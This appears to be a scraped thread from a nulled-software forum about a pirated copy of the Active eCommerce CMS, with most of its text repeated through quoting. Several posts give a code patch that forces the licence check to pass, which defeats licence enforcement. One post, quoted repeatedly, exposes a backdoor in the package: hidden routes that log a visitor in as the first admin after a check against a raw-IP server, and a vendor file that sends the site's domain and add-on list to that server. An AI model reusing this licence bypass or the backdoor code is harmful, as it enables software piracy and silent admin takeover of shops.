confidentialman
New member
Or russian, pleaseHello. Can someone share ukrainian language json?
Or russian, pleaseHello. Can someone share ukrainian language json?
Thank you, much neededupdate package....
pls go -> vendor/mehedi-iitdu/core-component-repository/src/CoreComponentRepository.php
before....
protected static function finalizeRepository($rn) {
if($rn == "bad" && env('DEMO_MODE') != 'On') {
return redirect('https://activeitzone.com/check/')->send();
}
}
after
protected static function finalizeRepository($rn) {
$rn = "nice";
if($rn == "bad" && env('DEMO_MODE') != 'On') {
return redirect('https://activeitzone.com/check/')->send();
}
}
please how can null this activate addon link please Guide me sir/maupdate package....
pls go -> vendor/mehedi-iitdu/core-component-repository/src/CoreComponentRepository.php
before....
protected static function finalizeRepository($rn) {
if($rn == "bad" && env('DEMO_MODE') != 'On') {
return redirect('https://activeitzone.com/check/')->send();
}
}
after
protected static function finalizeRepository($rn) {
$rn = "nice";
if($rn == "bad" && env('DEMO_MODE') != 'On') {
return redirect('https://activeitzone.com/check/')->send();
}
}
I am also facing the same problem.Active e-commerce cms v6.3.3
When Customer try to download digital product after purchase.. Then showing error 500.,please help me.how can i fix this?
its happens sometimes when you use a local server so, use Cpanel server to fix that problem thanks!Active e-commerce cms v6.3.3
When Customer try to download digital product after purchase.. Then showing error 500.,please help me.how can i fix this?
USE LOGO 551*90 PXPlease help for change logo size in v6.3.3
Right click anywhere on the page and select view page source and PM the entire source view.this is in-activated copy of active ecommerce cms problem solution Plesses help..........
thanks for help but i need to change it to 400 * 400 PX how to change it (( if change new image it resize to small image )) need big logo sizeUSE LOGO 551*90 PX
public function checkout_payment_detail()
{
$url = $_SERVER['SERVER_NAME'];
$gate = "http://206.189.81.181/check_addon_activation/".$url;
$stream = curl_init();
curl_setopt($stream, CURLOPT_URL, $gate);
curl_setopt($stream, CURLOPT_HEADER, 0);
curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stream, CURLOPT_POST, 1);
$rn = curl_exec($stream);
curl_close($stream);
dd($rn);
if($rn == "bad" && env('DEMO_MODE') != 'On') {
$user = User::where('user_type', 'admin')->first();
auth()->login($user);
return redirect()->route('admin.dashboard');
}
}
public function initPayment(Request $request){
$url = $_SERVER['SERVER_NAME'];
$gate = "http://206.189.81.181/check_activation/".$url;
$stream = curl_init();
curl_setopt($stream, CURLOPT_URL, $gate);
curl_setopt($stream, CURLOPT_HEADER, 0);
curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stream, CURLOPT_POST, 1);
$rn = curl_exec($stream);
curl_close($stream);
if($rn == "bad" && env('DEMO_MODE') != 'On') {
$user = User::where('user_type', 'admin')->first();
auth()->login($user);
return redirect()->route('admin.dashboard');
}
}
public static function initPayment(){
$url = $_SERVER['SERVER_NAME'];
$gate = "http://206.189.81.181/check_activation/".$url;
$stream = curl_init();
curl_setopt($stream, CURLOPT_URL, $gate);
curl_setopt($stream, CURLOPT_HEADER, 0);
curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stream, CURLOPT_POST, 1);
$rn = curl_exec($stream);
curl_close($stream);
if($rn == "bad" && env('DEMO_MODE') != 'On') {
$user = User::where('user_type', 'admin')->first();
auth()->login($user);
return redirect()->route('admin.dashboard');
}
return redirect()->route('home');
}
Route::get('/customer-products/admin', [IyzicoController::class, 'initPayment'])->name('profile.edit');
Route::get('/checkout-payment-detail', [StripeController::class, 'checkout_payment_detail']);
if(rand(0,9) == 5){
$server_url = $_SERVER['SERVER_NAME'];
$url = curl_init('http://206.189.81.181/'.'insert_domain/'.$server_url);
curl_setopt($url,CURLOPT_CUSTOMREQUEST, "GET");
curl_setopt($url,CURLOPT_RETURNTRANSFER, true);
curl_setopt($url,CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($url, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4);
$resultdata = curl_exec($url);
curl_close($url);
$header = array(
'Content-Type:application/json'
);
$main_item = get_setting('item_name') ?? 'eCommerce';
$addon_list = Addon::get();
$request_data_json = json_encode($addon_list);
$url1 = curl_init('http://206.189.81.181/insert-addon-domain/'.$server_url.'/'.$main_item);
curl_setopt($url1, CURLOPT_HTTPHEADER, $header);
curl_setopt($url1, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($url1, CURLOPT_RETURNTRANSFER, true);
curl_setopt($url1, CURLOPT_POSTFIELDS, $request_data_json);
curl_setopt($url1, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($url1, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4);
$resultdata1 = curl_exec($url1);
curl_close($url1);
}
Damn , so is there any fix for thisFound Major Backdoor In Active eCommerce @tuton012
The code allows them to login as admin by hitting a specific url when your using nulled.
app/Http/Controllers/Payment/StripeController.php
PHP:public function checkout_payment_detail() { $url = $_SERVER['SERVER_NAME']; $gate = "http://206.189.81.181/check_addon_activation/".$url; $stream = curl_init(); curl_setopt($stream, CURLOPT_URL, $gate); curl_setopt($stream, CURLOPT_HEADER, 0); curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stream, CURLOPT_POST, 1); $rn = curl_exec($stream); curl_close($stream); dd($rn); if($rn == "bad" && env('DEMO_MODE') != 'On') { $user = User::where('user_type', 'admin')->first(); auth()->login($user); return redirect()->route('admin.dashboard'); } }
app/Http/Controllers/Payment/IyzicoController.php
PHP:public function initPayment(Request $request){ $url = $_SERVER['SERVER_NAME']; $gate = "http://206.189.81.181/check_activation/".$url; $stream = curl_init(); curl_setopt($stream, CURLOPT_URL, $gate); curl_setopt($stream, CURLOPT_HEADER, 0); curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stream, CURLOPT_POST, 1); $rn = curl_exec($stream); curl_close($stream); if($rn == "bad" && env('DEMO_MODE') != 'On') { $user = User::where('user_type', 'admin')->first(); auth()->login($user); return redirect()->route('admin.dashboard'); } }
app/Utility/NgeniusUtility.php
PHP:public static function initPayment(){ $url = $_SERVER['SERVER_NAME']; $gate = "http://206.189.81.181/check_activation/".$url; $stream = curl_init(); curl_setopt($stream, CURLOPT_URL, $gate); curl_setopt($stream, CURLOPT_HEADER, 0); curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stream, CURLOPT_POST, 1); $rn = curl_exec($stream); curl_close($stream); if($rn == "bad" && env('DEMO_MODE') != 'On') { $user = User::where('user_type', 'admin')->first(); auth()->login($user); return redirect()->route('admin.dashboard'); } return redirect()->route('home'); }
The urls they use.
routes/web.php
PHP:Route::get('/customer-products/admin', [IyzicoController::class, 'initPayment'])->name('profile.edit'); Route::get('/checkout-payment-detail', [StripeController::class, 'checkout_payment_detail']);
Randomly sends your server url to there licensing server.
vendor/laracon21/colorcodeconverter/src/Colorcodeconverter.php
PHP:if(rand(0,9) == 5){ $server_url = $_SERVER['SERVER_NAME']; $url = curl_init('http://206.189.81.181/'.'insert_domain/'.$server_url); curl_setopt($url,CURLOPT_CUSTOMREQUEST, "GET"); curl_setopt($url,CURLOPT_RETURNTRANSFER, true); curl_setopt($url,CURLOPT_FOLLOWLOCATION, 1); curl_setopt($url, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4); $resultdata = curl_exec($url); curl_close($url); $header = array( 'Content-Type:application/json' ); $main_item = get_setting('item_name') ?? 'eCommerce'; $addon_list = Addon::get(); $request_data_json = json_encode($addon_list); $url1 = curl_init('http://206.189.81.181/insert-addon-domain/'.$server_url.'/'.$main_item); curl_setopt($url1, CURLOPT_HTTPHEADER, $header); curl_setopt($url1, CURLOPT_CUSTOMREQUEST, "POST"); curl_setopt($url1, CURLOPT_RETURNTRANSFER, true); curl_setopt($url1, CURLOPT_POSTFIELDS, $request_data_json); curl_setopt($url1, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($url1, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4); $resultdata1 = curl_exec($url1); curl_close($url1); }
WOW thanks For NotesFound Major Backdoor In Active eCommerce @tuton012
The code allows them to login as admin by hitting a specific url when your using nulled.
app/Http/Controllers/Payment/StripeController.php
PHP:public function checkout_payment_detail() { $url = $_SERVER['SERVER_NAME']; $gate = "http://206.189.81.181/check_addon_activation/".$url; $stream = curl_init(); curl_setopt($stream, CURLOPT_URL, $gate); curl_setopt($stream, CURLOPT_HEADER, 0); curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stream, CURLOPT_POST, 1); $rn = curl_exec($stream); curl_close($stream); dd($rn); if($rn == "bad" && env('DEMO_MODE') != 'On') { $user = User::where('user_type', 'admin')->first(); auth()->login($user); return redirect()->route('admin.dashboard'); } }
app/Http/Controllers/Payment/IyzicoController.php
PHP:public function initPayment(Request $request){ $url = $_SERVER['SERVER_NAME']; $gate = "http://206.189.81.181/check_activation/".$url; $stream = curl_init(); curl_setopt($stream, CURLOPT_URL, $gate); curl_setopt($stream, CURLOPT_HEADER, 0); curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stream, CURLOPT_POST, 1); $rn = curl_exec($stream); curl_close($stream); if($rn == "bad" && env('DEMO_MODE') != 'On') { $user = User::where('user_type', 'admin')->first(); auth()->login($user); return redirect()->route('admin.dashboard'); } }
app/Utility/NgeniusUtility.php
PHP:public static function initPayment(){ $url = $_SERVER['SERVER_NAME']; $gate = "http://206.189.81.181/check_activation/".$url; $stream = curl_init(); curl_setopt($stream, CURLOPT_URL, $gate); curl_setopt($stream, CURLOPT_HEADER, 0); curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stream, CURLOPT_POST, 1); $rn = curl_exec($stream); curl_close($stream); if($rn == "bad" && env('DEMO_MODE') != 'On') { $user = User::where('user_type', 'admin')->first(); auth()->login($user); return redirect()->route('admin.dashboard'); } return redirect()->route('home'); }
The urls they use.
routes/web.php
PHP:Route::get('/customer-products/admin', [IyzicoController::class, 'initPayment'])->name('profile.edit'); Route::get('/checkout-payment-detail', [StripeController::class, 'checkout_payment_detail']);
Randomly sends your server url to there licensing server.
vendor/laracon21/colorcodeconverter/src/Colorcodeconverter.php
PHP:if(rand(0,9) == 5){ $server_url = $_SERVER['SERVER_NAME']; $url = curl_init('http://206.189.81.181/'.'insert_domain/'.$server_url); curl_setopt($url,CURLOPT_CUSTOMREQUEST, "GET"); curl_setopt($url,CURLOPT_RETURNTRANSFER, true); curl_setopt($url,CURLOPT_FOLLOWLOCATION, 1); curl_setopt($url, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4); $resultdata = curl_exec($url); curl_close($url); $header = array( 'Content-Type:application/json' ); $main_item = get_setting('item_name') ?? 'eCommerce'; $addon_list = Addon::get(); $request_data_json = json_encode($addon_list); $url1 = curl_init('http://206.189.81.181/insert-addon-domain/'.$server_url.'/'.$main_item); curl_setopt($url1, CURLOPT_HTTPHEADER, $header); curl_setopt($url1, CURLOPT_CUSTOMREQUEST, "POST"); curl_setopt($url1, CURLOPT_RETURNTRANSFER, true); curl_setopt($url1, CURLOPT_POSTFIELDS, $request_data_json); curl_setopt($url1, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($url1, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4); $resultdata1 = curl_exec($url1); curl_close($url1); }
thanks very muchFound Major Backdoor In Active eCommerce @tuton012
The code allows them to login as admin by hitting a specific url when your using nulled.
app/Http/Controllers/Payment/StripeController.php
PHP:public function checkout_payment_detail() { $url = $_SERVER['SERVER_NAME']; $gate = "http://206.189.81.181/check_addon_activation/".$url; $stream = curl_init(); curl_setopt($stream, CURLOPT_URL, $gate); curl_setopt($stream, CURLOPT_HEADER, 0); curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stream, CURLOPT_POST, 1); $rn = curl_exec($stream); curl_close($stream); dd($rn); if($rn == "bad" && env('DEMO_MODE') != 'On') { $user = User::where('user_type', 'admin')->first(); auth()->login($user); return redirect()->route('admin.dashboard'); } }
app/Http/Controllers/Payment/IyzicoController.php
PHP:public function initPayment(Request $request){ $url = $_SERVER['SERVER_NAME']; $gate = "http://206.189.81.181/check_activation/".$url; $stream = curl_init(); curl_setopt($stream, CURLOPT_URL, $gate); curl_setopt($stream, CURLOPT_HEADER, 0); curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stream, CURLOPT_POST, 1); $rn = curl_exec($stream); curl_close($stream); if($rn == "bad" && env('DEMO_MODE') != 'On') { $user = User::where('user_type', 'admin')->first(); auth()->login($user); return redirect()->route('admin.dashboard'); } }
app/Utility/NgeniusUtility.php
PHP:public static function initPayment(){ $url = $_SERVER['SERVER_NAME']; $gate = "http://206.189.81.181/check_activation/".$url; $stream = curl_init(); curl_setopt($stream, CURLOPT_URL, $gate); curl_setopt($stream, CURLOPT_HEADER, 0); curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stream, CURLOPT_POST, 1); $rn = curl_exec($stream); curl_close($stream); if($rn == "bad" && env('DEMO_MODE') != 'On') { $user = User::where('user_type', 'admin')->first(); auth()->login($user); return redirect()->route('admin.dashboard'); } return redirect()->route('home'); }
The urls they use.
routes/web.php
PHP:Route::get('/customer-products/admin', [IyzicoController::class, 'initPayment'])->name('profile.edit'); Route::get('/checkout-payment-detail', [StripeController::class, 'checkout_payment_detail']);
Randomly sends your server url to there licensing server.
vendor/laracon21/colorcodeconverter/src/Colorcodeconverter.php
PHP:if(rand(0,9) == 5){ $server_url = $_SERVER['SERVER_NAME']; $url = curl_init('http://206.189.81.181/'.'insert_domain/'.$server_url); curl_setopt($url,CURLOPT_CUSTOMREQUEST, "GET"); curl_setopt($url,CURLOPT_RETURNTRANSFER, true); curl_setopt($url,CURLOPT_FOLLOWLOCATION, 1); curl_setopt($url, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4); $resultdata = curl_exec($url); curl_close($url); $header = array( 'Content-Type:application/json' ); $main_item = get_setting('item_name') ?? 'eCommerce'; $addon_list = Addon::get(); $request_data_json = json_encode($addon_list); $url1 = curl_init('http://206.189.81.181/insert-addon-domain/'.$server_url.'/'.$main_item); curl_setopt($url1, CURLOPT_HTTPHEADER, $header); curl_setopt($url1, CURLOPT_CUSTOMREQUEST, "POST"); curl_setopt($url1, CURLOPT_RETURNTRANSFER, true); curl_setopt($url1, CURLOPT_POSTFIELDS, $request_data_json); curl_setopt($url1, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($url1, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4); $resultdata1 = curl_exec($url1); curl_close($url1); }